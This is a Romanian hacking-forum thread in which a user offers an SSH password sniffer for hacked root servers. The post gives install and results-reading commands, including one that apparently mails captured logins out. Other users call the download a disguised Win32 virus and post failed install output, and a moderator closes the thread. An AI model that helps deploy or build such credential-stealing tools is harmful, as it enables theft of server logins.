Jump to content
SiAmStat

Linux Sniffer 2011

Recommended Posts

Sal vreau sa ma las de hacking si vreau inainte sa fac asta sa postez ultima versiune de Sniffer , ea merge pe toate linuxurile mai putin ubuntu 9.04 . El face acelasi lucru care il fac si snifferele vechi doar ca merge instalat si pe rooturile 2010-2011 la care aveti uid 0.

Comenzile de instalare sunt la fel doar compatibilitatea la librarii a fost adaugata

./inst password mailu@vostru.com = comanda de instalare

desnfread = comanda ptr results

Daca cumva nu va merge pe root inseamna ca nu are toate librariile instalate , pute-ti rezolva asta cu :

apt-get install gcc sau yum install gcc

Astept reviewuri pozitive de la voi ptr acest share , Snifferu fiind open source .

muie

Happy Hacking and Enjoy !

Edited by Zatarra
Da am facut-o grava
Link to comment
Share on other sites

Daca cumva nu va merge pe root inseamna ca nu are toate librariile instalate , pute-ti rezolva asta cu :

apt-get install gcc sau yum install gcc

Ce treaba are cu root daca ai sau nu gcc instalat? Stii macar ce vorbesti? Daca e chiar sniffer, atunci una dintre librariile necesare ar fi libpcap (in cele mai multe cazuri)... Daca zici ca te-ai lasat de hacking inseamna ca azi ai si inceput... Oricum ar fi fost minunat din partea ta si un link catre sursa :)

Link to comment
Share on other sites

Ms de flame il merit , am postat pe mai multe forumuri si am sters si am scris din engleza in romana si am dat-o dracu .

Totti stii tu ce stii libpcap te ajuta ptr keylogger worm aka "Desnfread" dar o sa vezi ca ai nev de mult mai multe librarii. Aceasta problema o rezolvi cu gcc . Ptr cei care nu stiu cum sa instaleaza librariile:

-------------------------------------------------------------------------------------

Ptr Debian si cele mai folosite linuxuri:

apt-get install debian-archive-keyring build-essential linux-headers-`uname -r` make gcc

sau

apt-get install gcc

Pentru Fedora , Redhat etc:

yum groupinstall "Development Tools"

yum install kernel-devel kernel-headers

-------------------------------------------------------------------------------------

Am updatat primul post cu linku.

Sa Traiesc!

Link to comment
Share on other sites

Doar asa de pomana:

Acest program este un executabil Win32 => este binar => nu ai nevoie de gcc sau orice alt compilator => ai nevoie de wine => esti ratat

Ma-ntreb ce virus ai bagat aici? Crezi ca prostesti lumea? :))

L.E.: Ai merita un ban frumos, dar mai poti sta sa-si bata joc si altii de tine :)

Edited by totti93
Link to comment
Share on other sites

Parere personala pentru care sincer o sa iau warm..

Idiotu a vazut ca multi vand root-uri si sa pus de prost sa "fure" si el. Dar nu stie ca prostia duce la un reverse nebun.Lol auzi acolo , "special/exclusiv pentru linux"

DIn ce ai scris se remarca ca esti un cocalar stramt in buci care mort de foame cauta bani de paine...

Link to comment
Share on other sites

Your public key has been saved in /etc/ssh/ssh_host_key.pub.

The key fingerprint is:

52:cb:47:3a:3c:fa:d2:63:77:58:1c:a1:2a:35:21:a6 root@vps9e1ad6

/etc/ssh/ssh_host_dsa_key already exists, skipping.

/etc/ssh/ssh_host_rsa_key already exists, skipping.

/usr/sbin/sshd -t -f /etc/ssh/sshd_config

[+] If this or something similar is shown to you: <FATAL: Creating listener failed: port 22 probably already in use!>

[+] Type fuser -n tcp 22 and then kill the pid with kill -9 <pid>

[+] /usr/sbin/ifconfig

root@vps9e1ad6:~/sshsniff# desnfread

-bash: desnfread: command not found

root@vps9e1ad6:~/sshsniff# Desnfread

-bash: Desnfread: command not found

Link to comment
Share on other sites

Your public key has been saved in /etc/ssh/ssh_host_key.pub.

The key fingerprint is:

52:cb:47:3a:3c:fa:d2:63:77:58:1c:a1:2a:35:21:a6 root@vps9e1ad6

/etc/ssh/ssh_host_dsa_key already exists, skipping.

/etc/ssh/ssh_host_rsa_key already exists, skipping.

/usr/sbin/sshd -t -f /etc/ssh/sshd_config

[+] If this or something similar is shown to you: <FATAL: Creating listener failed: port 22 probably already in use!>

[+] Type fuser -n tcp 22 and then kill the pid with kill -9 <pid>

[+] /usr/sbin/ifconfig

root@vps9e1ad6:~/sshsniff# desnfread

-bash: desnfread: command not found

root@vps9e1ad6:~/sshsniff# Desnfread

-bash: Desnfread: command not found

Link to comment
Share on other sites

anul trecut. am vazut o.O care-i faza ? Poate unii vor sa-l foloseasca... sari asa ca ciobanu' fara sa gandesti putin

Si tu ce sari asa ca scroafa homosexuala fara sa citesti regulile ? Ban 7 zile.

Ai timp sa dai cu pingu-n localhost de nebun.

Thread closed, ca si asa era deschis de alt labar cu impresii de hacker.

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.


×
×
  • Create New...